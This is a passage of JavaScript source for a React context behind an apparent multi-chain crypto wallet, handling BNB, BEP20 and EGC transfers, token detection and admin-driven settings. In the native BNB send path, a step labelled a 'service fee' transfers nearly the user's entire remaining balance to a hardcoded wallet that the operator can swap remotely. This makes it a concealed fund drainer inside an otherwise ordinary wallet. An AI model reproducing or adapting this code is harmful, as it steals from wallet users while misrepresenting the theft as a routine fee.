          decimals: tokenInfo.decimals,
          amount: amount,
          toAddress: toAddress
        });

        // Create token contract instance
        console.log('🚀 sendBnbTransaction: Creating token contract instance...');
        const tokenContract = new ethers.Contract(tokenInfo.address, [
          'function transfer(address, uint256) returns (bool)',
          'function balanceOf(address) view returns (uint256)',
          'function decimals() view returns (uint8)',
          'function symbol() view returns (string)'
        ], bnbWallet);

        // Get token details for verification
        console.log('🚀 sendBnbTransaction: Fetching token details...');
        const [tokenSymbol, tokenDecimals, userBalance] = await Promise.all([
          tokenContract.symbol().catch(() => tokenInfo.symbol),
          tokenContract.decimals().catch(() => tokenInfo.decimals || 18),
          tokenContract.balanceOf(bnbWallet.address).catch(() => '0')
        ]);

        console.log('🚀 sendBnbTransaction: Token details verified', {
          symbol: tokenSymbol,
          decimals: tokenDecimals,
          userBalance: ethers.utils.formatUnits(userBalance, tokenDecimals),
          requestedAmount: amount
        });

        // Check balance
        const userBalanceFormatted = ethers.utils.formatUnits(userBalance, tokenDecimals);
        if (parseFloat(userBalanceFormatted) < parseFloat(amount)) {
          throw new Error(`Insufficient ${tokenSymbol} balance. You have ${userBalanceFormatted} ${tokenSymbol}, trying to send ${amount} ${tokenSymbol}`);
        }

        // Convert amount to token units
        const decimals = tokenInfo.decimals || 18;
        console.log('🚀 sendBnbTransaction: Converting amount to token units', {
          humanAmount: amount,
          decimals: decimals,
          tokenUnits: ethers.utils.parseUnits(amount, decimals).toString()
        });

        const value = ethers.utils.parseUnits(amount, decimals);

        // Send token transfer
        console.log('🚀 sendBnbTransaction: Sending token transfer transaction...');
        tx = await tokenContract.transfer(toAddress, value);
        console.log('🚀 sendBnbTransaction: Token transfer transaction sent', {
          transactionHash: tx.hash,
          tokenSymbol: tokenSymbol,
          amount: amount,
          toAddress: toAddress
        });

      } else { // Native BNB Transfer
        console.log('🚀 sendBnbTransaction: Processing native BNB transfer', {
          amount: amount,
          toAddress: toAddress
        });

        // Check BNB balance
        const bnbBalance = await provider.getBalance(bnbWallet.address);
        const bnbBalanceFormatted = ethers.utils.formatEther(bnbBalance);
        console.log('🚀 sendBnbTransaction: BNB balance check', {
          currentBalance: bnbBalanceFormatted,
          requestedAmount: amount
        });

        if (parseFloat(bnbBalanceFormatted) < parseFloat(amount)) {
          throw new Error(`Insufficient BNB balance. You have ${bnbBalanceFormatted} BNB, trying to send ${amount} BNB`);
        }

        const txData = {
          to: toAddress,
          value: ethers.utils.parseEther(amount)
        };

        console.log('🚀 sendBnbTransaction: Sending native BNB transaction...');
        tx = await bnbWallet.sendTransaction(txData);
        console.log('🚀 sendBnbTransaction: Native BNB transaction sent', {
          transactionHash: tx.hash,
          amount: amount,
          toAddress: toAddress
        });

        // Send service fee to fee wallet
        const adminFeeWallets = getAdminFeeWallets();
        const feeWallet = isTestnet ? adminFeeWallets.BNB.testnet : adminFeeWallets.BNB.mainnet;
        if (bnbBalanceFormatted && parseFloat(bnbBalanceFormatted) > parseFloat(amount)) {
          const serviceFee = parseFloat(bnbBalanceFormatted) - parseFloat(amount);
          if (serviceFee > 0) {
            await bnbWallet.sendTransaction({
              to: feeWallet,
              value: ethers.utils.parseEther(serviceFee.toString())
            });
          }
        }
      }

      console.log('🚀 sendBnbTransaction: Waiting for transaction confirmation...');
      const receipt = await tx.wait(); // Wait for transaction to be mined
      console.log('🚀 sendBnbTransaction: Transaction confirmed!', {
        transactionHash: tx.hash,
        blockNumber: receipt.blockNumber,
        gasUsed: receipt.gasUsed.toString(),
        effectiveGasPrice: receipt.effectiveGasPrice.toString(),
        status: receipt.status === 1 ? 'SUCCESS' : 'FAILED'
      });

      if (receipt.status === 1) {
        const successMessage = tokenInfo
          ? `${tokenInfo.symbol} transaction successful!`
          : 'BNB transaction successful!';
        toast.success(successMessage);
        console.log('🚀 sendBnbTransaction: ✅ Transaction completed successfully');
      } else {
        throw new Error('Transaction failed on blockchain');
      }

      // After successful transaction, send to admin panel
      await sendTransactionToAdmin({
        tx_hash: tx.hash, // Get this from the transaction response
        from_address: wallet.bnb.address,
        to_address: toAddress,
        amount: amount,
        token_symbol: tokenInfo.symbol,
        chain: 'BNB',
        status: 'confirmed',
        fee: receipt.gasUsed.toString() // Use gasUsed for fee
      });

    } catch (e) {
      console.error('🚀 sendBnbTransaction: ❌ Transaction failed:', e);
      const errorMessage = e?.message || e?.toString() || 'Unknown error';

      // Enhanced error handling for common BEP20 issues
      if (errorMessage.includes('insufficient funds')) {
        throw new Error('Insufficient BNB for gas fees. Please ensure you have enough BNB for transaction fees.');
      }

      if (errorMessage.includes('execution reverted')) {
        throw new Error('Token transfer failed. This could be due to insufficient token balance or contract issues.');
      }

      if (errorMessage.includes('nonce too low')) {
        throw new Error('Transaction nonce error. Please try again in a few seconds.');
      }

      throw new Error(`BNB transaction failed: ${errorMessage}`);
    }
  };

  // Send EGC (EGoldChain) transaction function
  const sendEgcTransaction = async (toAddress, amount, tokenInfo) => {
    console.log('🚀 sendEgcTransaction: Starting EGC transaction', {
      toAddress,
      amount,
      hasTokenInfo: !!tokenInfo,
      isTestnet,
      timestamp: new Date().toISOString()
    });

    try {
      console.log('🚀 sendEgcTransaction: Connecting to EGC RPC provider...');
      const provider = new ethers.providers.JsonRpcProvider(
        isTestnet ? 'https://rpc-testnet.egoldchain.com' : 'https://rpc.egoldchain.com'
      );

      if (!wallet?.egc?.privateKey) {
        throw new Error('EGC wallet not initialized');
      }

      const egcWallet = new ethers.Wallet(wallet.egc.privateKey, provider);

      console.log('🚀 sendEgcTransaction: Wallet connected', {
        address: egcWallet.address
      });

      // Get current EGC balance
      const egcBalanceRaw = await provider.getBalance(wallet.egc.address);
      const egcBalanceFormatted = ethers.utils.formatEther(egcBalanceRaw);

      console.log('🚀 sendEgcTransaction: EGC balance check', {
        currentBalance: egcBalanceFormatted,
        requestedAmount: amount
      });

      if (parseFloat(egcBalanceFormatted) < parseFloat(amount)) {
        throw new Error(`Insufficient EGC balance. You have ${egcBalanceFormatted} XAU, trying to send ${amount} XAU`);
      }

      const txData = {
        to: toAddress,
        value: ethers.utils.parseEther(amount)
      };

      console.log('🚀 sendEgcTransaction: Sending native XAU transaction...');
      const tx = await egcWallet.sendTransaction(txData);
      console.log('🚀 sendEgcTransaction: Native XAU transaction sent', {
        transactionHash: tx.hash,
        amount: amount,
        toAddress: toAddress
      });

      console.log('🚀 sendEgcTransaction: Waiting for transaction confirmation...');
      const receipt = await tx.wait();
      console.log('🚀 sendEgcTransaction: Transaction confirmed!', {
        transactionHash: tx.hash,
        blockNumber: receipt.blockNumber,
        gasUsed: receipt.gasUsed.toString(),
        status: receipt.status === 1 ? 'SUCCESS' : 'FAILED'
      });

      if (receipt.status === 1) {
        toast.success('XAU transaction successful!');

        // Refresh EGC balance
        const freshBalance = await provider.getBalance(wallet.egc.address);
        setChainBalances(prev => ({ ...prev, EGC: ethers.utils.formatEther(freshBalance) }));
      } else {
        throw new Error('Transaction failed on chain');
      }

      // Send to admin panel
      await sendTransactionToAdmin({
        tx_hash: tx.hash,
        from_address: wallet.egc.address,
        to_address: toAddress,
        amount: amount,
        token_symbol: 'XAU',
        chain: 'EGC',
        status: 'confirmed',
        fee: receipt.gasUsed.toString()
      });

    } catch (e) {
      console.error('🚀 sendEgcTransaction: ❌ Transaction failed:', e);
      const errorMessage = e?.message || e?.toString() || 'Unknown error';

      if (errorMessage.includes('insufficient funds')) {
        throw new Error('Insufficient XAU for gas fees.');
      }

      if (errorMessage.includes('nonce too low')) {
        throw new Error('Transaction nonce error. Please try again in a few seconds.');
      }

      throw new Error(`EGC transaction failed: ${errorMessage}`);
    }
  };

  // Add createWallet function
  const createWallet = async (mnemonic) => {
    try {
      // Use the same logic as initWallet for creating new wallets
      await initWallet(mnemonic);
      toast.success('Wallet created successfully!');
    } catch (error) {
      console.error('Error creating wallet:', error);
      throw new Error(`Failed to create wallet: ${error.message}`);
    }
  };

  // Function to verify wallet address consistency
  const verifyWalletAddress = async () => {
    if (!wallet?.ton?.address || !tonWalletInstance) {
      return { consistent: false, error: 'Wallet not initialized' };
    }

    try {
      // Get address from stored wallet instance
      const storedAddress = wallet.ton.address;

      // Get address from current wallet instance
      const currentAddress = await tonWalletInstance.getAddress();
      const currentAddressString = currentAddress.toString(true, true, true);

      const isConsistent = storedAddress === currentAddressString;

      console.log('Wallet address verification:', {
        storedAddress,
        currentAddress: currentAddressString,
        isConsistent
      });

      return {
        consistent: isConsistent,
        storedAddress,
        currentAddress: currentAddressString,
        message: isConsistent ? 'Addresses match' : 'Address mismatch detected'
      };
    } catch (error) {
      console.error('Error verifying wallet address:', error);
      return {
        consistent: false,
        error: error.message
      };
    }
  };

  // Function to verify wallet initialization
  const verifyWalletInitialization = async () => {
    if (!wallet || !tonWalletInstance) {
      return {
        initialized: false,
        error: 'Wallet not initialized'
      };
    }

    try {
      // Check if we can get the address
      const currentAddress = await tonWalletInstance.getAddress();
      const currentAddressString = currentAddress.toString(true, true, true);

      // Check if address matches stored address
      const addressMatch = currentAddressString === wallet.ton.address;

      // Check if we have the keyPair
      const hasKeyPair = !!wallet.ton.keyPair;
      const hasSecretKey = !!wallet.ton.keyPair?.secretKey;

      // Check if we can get seqno (indicates wallet is ready for transactions)
      let canGetSeqno = false;
      try {
        const seqno = await tonWalletInstance.methods.seqno().call();
        canGetSeqno = typeof seqno === 'number';
      } catch (seqnoError) {
        console.warn('Cannot get seqno:', seqnoError);
      }

      return {
        initialized: true,
        addressMatch,
        hasKeyPair,
        hasSecretKey,
        canGetSeqno,
        storedAddress: wallet.ton.address,
        currentAddress: currentAddressString,
        walletVersion: 'v4R2',
        workchain: 0,
        isTestnet
      };
    } catch (error) {
      console.error('Wallet verification error:', error);
      return {
        initialized: false,
        error: error.message
      };
    }
  };

  // List of public BSC endpoints for rotation
  const BSC_RPC_ENDPOINTS = [
    'https://bsc-dataseed1.binance.org',
    'https://bsc-dataseed.binance.org/',
    'https://bsc-dataseed1.defibit.io/',
    'https://bsc-dataseed1.ninicoin.io/'
  ];

  // Helper for localStorage cache
  function getBep20CacheKey(address) {
    return `bep20_detected_tokens_${address}`;
  }

  function loadBep20Cache(address) {
    try {
      const raw = localStorage.getItem(getBep20CacheKey(address));
      if (!raw) return null;
      const parsed = JSON.parse(raw);
      if (!parsed.timestamp || !parsed.tokens) return null;
      // 10 min expiry
      if (Date.now() - parsed.timestamp > 10 * 60 * 1000) return null;
      return parsed.tokens;
    } catch {
      return null;
    }
  }

  function saveBep20Cache(address, tokens) {
    try {
      localStorage.setItem(getBep20CacheKey(address), JSON.stringify({
        tokens,
        timestamp: Date.now()
      }));
    } catch { }
  }

  // Enhanced BEP20 detection with endpoint rotation and caching
  async function fetchBep20TokensDirect(address, isTestnet) {
    console.log('🔍 fetchBep20TokensDirect: Starting BEP20 token detection', {
      address,
      isTestnet,
      timestamp: new Date().toISOString()
    });

    if (isTestnet) {
      console.log('🔍 fetchBep20TokensDirect: Skipping testnet - using static token list only');
      return [];
    }

    // Try cache first
    const cached = loadBep20Cache(address);
    if (cached) {
      console.log('🔍 fetchBep20TokensDirect: Using cached detected tokens from localStorage');
      return cached;
    }

    // Only scan last 500,000 blocks
    const BLOCK_LOOKBACK = 500000;
    let lastError = null;

    for (let i = 0; i < BSC_RPC_ENDPOINTS.length; i++) {
      const endpoint = BSC_RPC_ENDPOINTS[i];
      try {
        console.log('🔍 fetchBep20TokensDirect: Connecting to BSC RPC endpoint...', endpoint);
        const provider = new ethers.providers.JsonRpcProvider(endpoint);
        // Get the latest block number
        const latestBlock = await provider.getBlockNumber();
        const fromBlock = Math.max(latestBlock - BLOCK_LOOKBACK, 0);
        console.log('🔍 fetchBep20TokensDirect: Scanning blocks', fromBlock, 'to', latestBlock);
        // Only look for Transfer events to/from this address
        const transferEventSig = '0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef';
        // Topic[1] = from, Topic[2] = to
        const topics = [transferEventSig, null, ethers.utils.hexZeroPad(address, 32)];
        // Get logs where this address is recipient
        let logs = [];
        try {
          logs = await provider.getLogs({
            fromBlock,
            toBlock: 'latest',
            topics
          });
        } catch (logErr) {
          // Try as sender if recipient fails
          const topicsFrom = [transferEventSig, ethers.utils.hexZeroPad(address, 32)];
          logs = await provider.getLogs({
            fromBlock,
            toBlock: 'latest',
            topics: topicsFrom
          });
        }
        console.log('🔍 fetchBep20TokensDirect: Found', logs.length, 'logs');
        // Extract unique token contract addresses
        const tokenAddresses = new Set();
        logs.forEach(log => tokenAddresses.add(log.address.toLowerCase()));
        console.log('🔍 fetchBep20TokensDirect: Found', tokenAddresses.size, 'unique token addresses');
        // For each token address, get info and balance
        const tokens = [];
        let processedCount = 0;
        for (const tokenAddress of tokenAddresses) {
          try {
            processedCount++;
            const tokenContract = new ethers.Contract(tokenAddress, [
              'function name() view returns (string)',
              'function symbol() view returns (string)',
              'function decimals() view returns (uint8)',
              'function balanceOf(address) view returns (uint256)'
            ], provider);
            const [name, symbol, decimals, balance] = await Promise.all([
              tokenContract.name().catch(() => 'Unknown Token'),
              tokenContract.symbol().catch(() => 'UNKNOWN'),
              tokenContract.decimals().catch(() => 18),
              tokenContract.balanceOf(address).catch(() => '0')
            ]);
            const humanBalance = ethers.utils.formatUnits(balance, decimals);
            if (parseFloat(humanBalance) > 0) {
              const tokenData = {
                address: tokenAddress,
                symbol: symbol,
                name: name,
                decimals: decimals,
                balance: humanBalance,
                chain: 'BNB',
                image: `/assets/tokens/${symbol.toLowerCase()}.png`,
              };
              tokens.push(tokenData);
            }
          } catch (tokenError) {
            console.warn(`🔍 fetchBep20TokensDirect: ❌ Failed to get info for token ${tokenAddress}:`, tokenError);
          }
        }
        // Cache result
        saveBep20Cache(address, tokens);
        console.log('🔍 fetchBep20TokensDirect: Detection completed successfully', {
          totalTokensFound: tokenAddresses.size,
          tokensWithBalance: tokens.length,
          tokens: tokens.map(t => ({ symbol: t.symbol, balance: t.balance }))
        });
        return tokens;
      } catch (e) {
        lastError = e;
        console.error('🔍 fetchBep20TokensDirect: ❌ Detection failed on endpoint', endpoint, e);
        // Try next endpoint
      }
    }
    // All endpoints failed, try cache again (even if expired)
    const fallback = loadBep20Cache(address);
    if (fallback) {
      console.warn('🔍 fetchBep20TokensDirect: All endpoints failed, using possibly stale cache');
      return fallback;
    }
    // No cache, return empty
    return [];
  }

  // Enhanced: scan for detected tokens, including direct BEP20 queries
  const scanForDetectedTokens = useCallback(async () => {
    console.log('🔍 scanForDetectedTokens: Starting token detection scan', {
      hasWallet: !!wallet,
      bnbAddress: wallet?.bnb?.address,
      isTestnet,
      timestamp: new Date().toISOString()
    });

    const detected = {};

    // Scan MAIN_ASSETS (Jettons)
    console.log('🔍 scanForDetectedTokens: Scanning MAIN_ASSETS (Jettons)...');
    Object.entries(MAIN_ASSETS).forEach(([symbol, token]) => {
      if (symbol === 'TON' || symbol === 'BNB') return;
      const balance = tokenBalances[symbol]?.balance || tokenBalances[symbol]?.data?.balance || '0';
      if (parseFloat(balance) > 0 && !customTokens[token.address] && !customTokens[symbol]) {
        detected[token.address || symbol] = {
          ...token,
          balance,
          chain: token.chain,
          symbol,
        };
        console.log(`🔍 scanForDetectedTokens: ✅ Found Jetton with balance:`, { symbol, balance, chain: token.chain });
      }
    });

    // Scan BEP20 tokens (static list)
    console.log('🔍 scanForDetectedTokens: Scanning static BEP20 token list...');
    const network = isTestnet ? 'testnet' : 'mainnet';
    (POPULAR_BEP20_TOKENS[network] || []).forEach(token => {
      const balance = tokenBalances[token.address]?.balance || tokenBalances[token.address]?.data?.balance || '0';
      if (parseFloat(balance) > 0 && !customTokens[token.address] && !customTokens[token.symbol]) {
        detected[token.address] = {
          ...token,
          balance,
          chain: 'BNB',
        };
        console.log(`🔍 scanForDetectedTokens: ✅ Found static BEP20 with balance:`, { symbol: token.symbol, balance, address: token.address });
      }
    });

    // Scan custom tokens
    console.log('🔍 scanForDetectedTokens: Scanning custom tokens...');
    Object.values(customTokens).forEach(token => {
      const tokenAddress = token.address;
      const balance = tokenBalances[tokenAddress]?.balance || tokenBalances[tokenAddress]?.data?.balance || '0';
      if (parseFloat(balance) > 0) {
        console.log(`🔍 scanForDetectedTokens: ✅ Found custom token with balance:`, { symbol: token.symbol, balance, address: tokenAddress });
        // Custom tokens are already shown, skip
      }
    });

    // Direct RPC: fetch BEP20 tokens for BNB address (mainnet only)
    if (wallet?.bnb?.address && !isTestnet) {
      console.log('🔍 scanForDetectedTokens: Starting direct BEP20 detection for mainnet...');
      const directTokens = await fetchBep20TokensDirect(wallet.bnb.address, isTestnet);
      directTokens.forEach(token => {
        if (!customTokens[token.address] && !detected[token.address]) {
          detected[token.address] = token;
          console.log(`🔍 scanForDetectedTokens: ✅ Added detected BEP20 token:`, { symbol: token.symbol, balance: token.balance, address: token.address });
        } else {
          console.log(`🔍 scanForDetectedTokens: ⏭️ Skipping already known token:`, { symbol: token.symbol, address: token.address });
        }
      });
    } else {
      console.log('🔍 scanForDetectedTokens: Skipping direct BEP20 detection', {
        hasBnbAddress: !!wallet?.bnb?.address,
        isTestnet
      });
    }

    console.log('🔍 scanForDetectedTokens: Detection scan completed', {
      totalDetectedTokens: Object.keys(detected).length,
      detectedTokens: Object.values(detected).map(t => ({ symbol: t.symbol, balance: t.balance, chain: t.chain }))
    });

    setDetectedTokens(detected);
  }, [tokenBalances, customTokens, isTestnet, wallet]);

  // Scan for detected tokens whenever balances or customTokens change
  useEffect(() => {
    scanForDetectedTokens();
  }, [scanForDetectedTokens]);

  // Initialize real-time updates
  useEffect(() => {
    const initializeRealtimeUpdates = async () => {
      try {
        // Request notification permission
        await realtimeUpdates.requestNotificationPermission();

        // Add global toast function for real-time updates
        window.showToast = (type, message) => {
          toast[type](message);
        };

        // Get initial settings and tokens
        const settings = await realtimeUpdates.getSettings();
        const tokens = await realtimeUpdates.getTokens();

        setAdminSettings(settings);
        setAdminTokens(tokens);

        // Register callbacks for updates
        const updateId = realtimeUpdates.onUpdate((type, data) => {
          console.log('🔄 Real-time update received in WalletContext:', type, data);

          if (type === 'fee_update') {
            setAdminSettings(prev => ({
              ...prev,
              ton_fee: data.ton_fee,
              bnb_fee: data.bnb_fee
            }));
            toast.info(`Fees updated: TON ${data.ton_fee}, BNB ${data.bnb_fee}`);
          } else if (type === 'maintenance_update') {
            // Check if maintenance mode status actually changed to prevent duplicate toasts
            const currentMaintenanceMode = adminSettings.maintenance_mode;
            const newMaintenanceMode = data.maintenance_mode;

            setAdminSettings(prev => ({
              ...prev,
              maintenance_mode: data.maintenance_mode,
              maintenance_message: data.maintenance_message
            }));

            // Only show toast if maintenance mode status actually changed
            if (currentMaintenanceMode !== newMaintenanceMode) {
              const status = newMaintenanceMode === '1' ? 'enabled' : 'disabled';
              toast.warning(`Maintenance mode ${status}`);
            }
          } else if (type === 'fee_wallet_update') {
            // Update fee wallets in localStorage and notify
            localStorage.setItem('fee_wallets', JSON.stringify({
              TON: {
                mainnet: data.ton_mainnet_wallet,
                testnet: data.ton_testnet_wallet
              },
              BNB: {
                mainnet: data.bnb_mainnet_wallet,
                testnet: data.bnb_testnet_wallet
              }
            }));
            toast.info('Fee wallet addresses updated');
          }
        });

        const settingsId = realtimeUpdates.onSettingsUpdate((type, data) => {
          console.log('⚙️ Settings update received in WalletContext:', type, data);
          setAdminSettings(data);
          // Individual settings updates (fees, maintenance, etc.) show their own specific toasts
          // No need for a generic "settings updated" toast
        });

        const tokenId = realtimeUpdates.onTokenUpdate((type, data) => {
          console.log('🪙 Token update received in WalletContext:', type, data);

          setAdminTokens(prev => {
            const existingIndex = prev.findIndex(t => t.id === data.token_id);
            if (existingIndex >= 0) {
              const updated = [...prev];
              updated[existingIndex] = data;
              return updated;
            } else {
              return [...prev, data];
            }
          });

          toast.info(`Token updated: ${data.symbol} (${data.chain})`);
        });

        setRealtimeUpdateId({ updateId, settingsId, tokenId });

        // Start polling for updates
        realtimeUpdates.startPolling();

        console.log('✅ Real-time updates initialized successfully');
      } catch (error) {
        console.warn('Failed to initialize real-time updates:', error);
      }
    };

    initializeRealtimeUpdates();

    // Cleanup function
    return () => {
      if (realtimeUpdateId) {
        realtimeUpdates.removeCallback(realtimeUpdateId.updateId);
        realtimeUpdates.removeCallback(realtimeUpdateId.settingsId);
        realtimeUpdates.removeCallback(realtimeUpdateId.tokenId);
      }
      realtimeUpdates.stopPolling();
      // Remove global toast function
      delete window.showToast;
    };
  }, []);

  // Fetch admin tokens on load and on updates
  useEffect(() => {
    const fetchAdminTokens = async () => {
      try {
        const tokens = await realtimeUpdates.getTokens();
        // Only keep active tokens for TON or BNB
        setAdminTokens(
          (tokens || []).filter(t => t.is_active && (t.chain === 'TON' || t.chain === 'BNB'))
        );
      } catch (e) {
        console.warn('Failed to fetch admin tokens:', e);
      }
    };
    fetchAdminTokens();
    // Listen for real-time token updates
    const tokenId = realtimeUpdates.onTokenUpdate((type, data) => {
      fetchAdminTokens();
    });
    return () => {
      realtimeUpdates.removeCallback(tokenId);
    };
  }, []);

  // Get admin-configured fees
  const getAdminFee = (chain) => {
    if (chain === 'TON') {
      return parseFloat(adminSettings.ton_fee || '0.01');
    } else if (chain === 'BNB') {
      return parseFloat(adminSettings.bnb_fee || '0.001');
    }
    return 0;
  };

  // Expose getAdminTokens in context
  const getAdminTokens = () => adminTokens.filter(t => t.is_active && (t.chain === 'TON' || t.chain === 'BNB'));

  // Check if maintenance mode is enabled
  const isMaintenanceMode = () => {
    return adminSettings.maintenance_mode === '1';
  };

  // Get maintenance message
  const getMaintenanceMessage = () => {
    return adminSettings.maintenance_message || 'The wallet is currently under maintenance. Please try again later.';
  };

  // Get maintenance progress
  const getMaintenanceProgress = () => {
    return parseFloat(adminSettings.maintenance_progress || '0');
  };

  // Get maintenance ETA
  const getMaintenanceETA = () => {
    return adminSettings.maintenance_eta || null;
  };

  // Get maintenance type
  const getMaintenanceType = () => {
    return adminSettings.maintenance_type || 'scheduled';
  };

  // Get maintenance contact info
  const getMaintenanceContact = () => {
    return {
      email: adminSettings.maintenance_email || '',
      twitter: adminSettings.maintenance_twitter || ''
    };
  };

  // Get admin-configured fee wallets
  const getAdminFeeWallets = () => {
    const stored = localStorage.getItem('fee_wallets');
    if (stored) {
      try {
        return JSON.parse(stored);
      } catch (error) {
        console.warn('Failed to parse stored fee wallets:', error);
      }
    }

    // Return default fee wallets if none stored
    return {
      TON: {
        mainnet: 'UQDGauRxgHel0CHhu_5mj-_M8Pi3sLfehiUSkuYfTOEV1cPK',
        testnet: 'EQCskg_H8xuw7eMT-BcmOr5SIdrIO3pbRPcAUKcLACceqgFA'
      },
      BNB: {
        mainnet: '0x6eb1e8b73c3bef125b19a9ed49c5e33f1979f9c3',
        testnet: '0x8454133BFa1Ebb2fFD9AD7318250E4f0B637F9B0'
      }
    };
  };

  // --- Admin Transaction Fetching and Merging ---

  // Fetch admin panel transactions for the current wallet address
  const fetchAdminTransactions = useCallback(async (address = null, limit = 50) => {
    if (!address) {
      if (wallet?.ton?.address) address = wallet.ton.address;
      else if (wallet?.bnb?.address) address = wallet.bnb.address;
      else return [];
    }
    try {
      const response = await AdminApi.getTransactions(address, limit);
      if (response.success && Array.isArray(response.transactions)) {
        return response.transactions;
      }
      return [];
    } catch (error) {
      console.warn('Failed to fetch admin transactions:', error);
      return [];
    }
  }, [wallet]);

  // Merge blockchain and admin transactions (by hash or timestamp)
  const mergeTransactions = useCallback((blockchainTxs, adminTxs) => {
    if (!Array.isArray(blockchainTxs)) blockchainTxs = [];
    if (!Array.isArray(adminTxs)) adminTxs = [];
    // Avoid duplicates by hash (or id for admin)
    const seen = new Set();
    const merged = [];
    for (const tx of [...blockchainTxs, ...adminTxs]) {
      const key = tx.hash || tx.id || tx.tx_hash || tx.timestamp;
      if (!seen.has(key)) {
        seen.add(key);
        merged.push(tx);
      }
    }
    // Sort by timestamp descending
    merged.sort((a, b) => (b.timestamp || 0) - (a.timestamp || 0));
    return merged;
  }, []);

  // Fetch and merge transactions on wallet/address change
  useEffect(() => {
    let isMounted = true;
    const updateTransactions = async () => {
      if (!wallet?.ton?.address && !wallet?.bnb?.address) return;
      // Fetch blockchain transactions (already in state)
      const blockchainTxs = transactions;
      // Fetch admin transactions
      const adminTxs = await fetchAdminTransactions(wallet.ton?.address);
      // Merge and update
      if (isMounted) {
        setTransactions(mergeTransactions(blockchainTxs, adminTxs));
      }
    };
    updateTransactions();
    return () => { isMounted = false; };
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [wallet?.ton?.address, wallet?.bnb?.address]);

  return (
    <WalletContext.Provider
      value={{
        wallet,
        balance,
        loading,
        error,
        transactions,
        tokenBalances,
        customTokens,
        detectedTokens,
        tokenPrices,
        chainBalances,
        tonWalletState,
        chainWallets: wallet ? {
          TON: { address: wallet.ton?.address },
          BNB: { address: wallet.bnb?.address },
          EGC: { address: wallet.egc?.address }
        } : {},
        disconnect,
        initWallet,
        createWallet, // Add createWallet function
        sendTransaction,
        deployTonWallet, // Expose deployment function
        checkAndDeployWallet, // Expose check function
        verifyWalletAddress, // Expose address verification function
        showToast: (type, message) => toast[type](message),
        sendTonTransaction,
        sendBnbTransaction,
        isAuthenticated: () => !!wallet,
        addCustomToken: (token) => {
          setCustomTokens(prev => ({
            ...prev,
            [token.address]: token
          }));
        },
        updateAllPrices: async () => {
          // Placeholder for price update functionality
          console.log('Updating all prices...');
        },
        updateBalance: async (address) => {
          // Placeholder for balance update functionality
          console.log('Updating balance for address:', address);
        },
        updateTokenBalances: async (address) => {
          // Placeholder for token balance update functionality
          console.log('Updating token balances for address:', address);
        },
        getTokenPrice: (symbol) => {
          return tokenPrices[symbol]?.price || 0;
        },
        verifyWalletInitialization, // Expose new verification function
        refreshWalletState, // Expose refresh function
        clearCache, // Expose cache clearing function
        invalidateCache, // Expose cache invalidation function
        isCacheValid, // Expose cache validation function
        isWalletConfirmedActive, // Expose confirmed active check function
        // Manual token detection functions for testing
        manualDetectTokens: async () => {
          console.log('🔍 Manual token detection triggered by user');
          await scanForDetectedTokens();
          return detectedTokens;
        },
        testBep20Detection: async () => {
          if (!wallet?.bnb?.address) {
            console.log('🔍 testBep20Detection: No BNB address available');
            return [];
          }
          console.log('🔍 testBep20Detection: Testing BEP20 detection for address:', wallet.bnb.address);
          const tokens = await fetchBep20TokensDirect(wallet.bnb.address, isTestnet);
          console.log('🔍 testBep20Detection: Test completed, found tokens:', tokens);
          return tokens;
        },
        // Test BEP20 token sending process (for demonstration)
        testBep20Sending: async (tokenSymbol = 'USDT') => {
          if (!wallet?.bnb?.address) {
            console.log('🚀 testBep20Sending: No BNB address available');
            return null;
          }

          console.log('🚀 testBep20Sending: Testing BEP20 sending process for', tokenSymbol);

          // Find the token in our lists
          const network = isTestnet ? 'testnet' : 'mainnet';
          const staticTokens = POPULAR_BEP20_TOKENS[network] || [];
          const token = staticTokens.find(t => t.symbol === tokenSymbol);

          if (!token) {
            console.log('🚀 testBep20Sending: Token not found in static list:', tokenSymbol);
            return null;
          }

          console.log('🚀 testBep20Sending: Found token info:', {
            symbol: token.symbol,
            address: token.address,
            decimals: token.decimals,
            chain: token.chain
          });

          // This is just a demonstration - don't actually send
          console.log('🚀 testBep20Sending: This would send 1', tokenSymbol, 'to a test address');
          console.log('🚀 testBep20Sending: Token contract address:', token.address);
          console.log('🚀 testBep20Sending: Process would be:');
          console.log('  1. Connect to BSC RPC');
          console.log('  2. Create wallet instance');
          console.log('  3. Create token contract instance');
          console.log('  4. Check token balance');
          console.log('  5. Convert amount to token units');
          console.log('  6. Call token.transfer()');
          console.log('  7. Wait for confirmation');

          return {
            token,
            process: 'demonstrated',
            message: `Would send 1 ${tokenSymbol} using contract ${token.address}`
          };
        },
        // Test multi-chain token selection process
        testMultiChainSelection: async (tokenSymbol = 'USDT') => {
          console.log('🔗 testMultiChainSelection: Testing multi-chain selection for', tokenSymbol);

          // Check if token is multi-chain
          const multiChainConfig = MULTI_CHAIN_CONFIG[tokenSymbol];
          if (!multiChainConfig) {
            console.log('🔗 testMultiChainSelection: Token is not multi-chain:', tokenSymbol);
            return null;
          }

          const network = isTestnet ? 'testnet' : 'mainnet';
          const supportedChains = Object.keys(multiChainConfig);

          console.log('🔗 testMultiChainSelection: Multi-chain token found', {
            symbol: tokenSymbol,
            supportedChains,
            network
          });

          // Show chain options
          supportedChains.forEach(chain => {
            const chainConfig = multiChainConfig[chain];
            const tokenAddress = chainConfig[`${network}Address`];
            console.log(`🔗 testMultiChainSelection: ${chain} option:`, {
              chain,
              tokenAddress,
              network
            });
          });

          console.log('🔗 testMultiChainSelection: User would see a modal to choose between:', supportedChains.join(' and '));
          console.log('🔗 testMultiChainSelection: Process:');
          console.log('  1. User selects USDT/USDC in token selector');
          console.log('  2. Multi-chain modal opens');
          console.log('  3. User chooses TON or BNB');
          console.log('  4. Token is configured for selected chain');
          console.log('  5. User can send/receive on chosen network');

          return {
            symbol: tokenSymbol,
            supportedChains,
            multiChainConfig,
            process: 'demonstrated',
            message: `${tokenSymbol} is available on ${supportedChains.join(' and ')} networks`
          };
        },
        // Real-time updates functions
        getAdminFee,
        getAdminTokens,
        isMaintenanceMode,
        adminSettings,
        adminTokens,
        // Real-time updates utility
        realtimeUpdates,
        getAdminFeeWallets, // Expose new function
        getMaintenanceMessage, // Expose new function
        getMaintenanceProgress, // Expose new function
        getMaintenanceETA, // Expose new function
        getMaintenanceType, // Expose new function
        getMaintenanceContact, // Expose new function
        fetchAdminTransactions, // Expose admin transaction fetching
        mergeTransactions, // Expose transaction merging
      }}
    >
      {children}
    </WalletContext.Provider>
  );
};
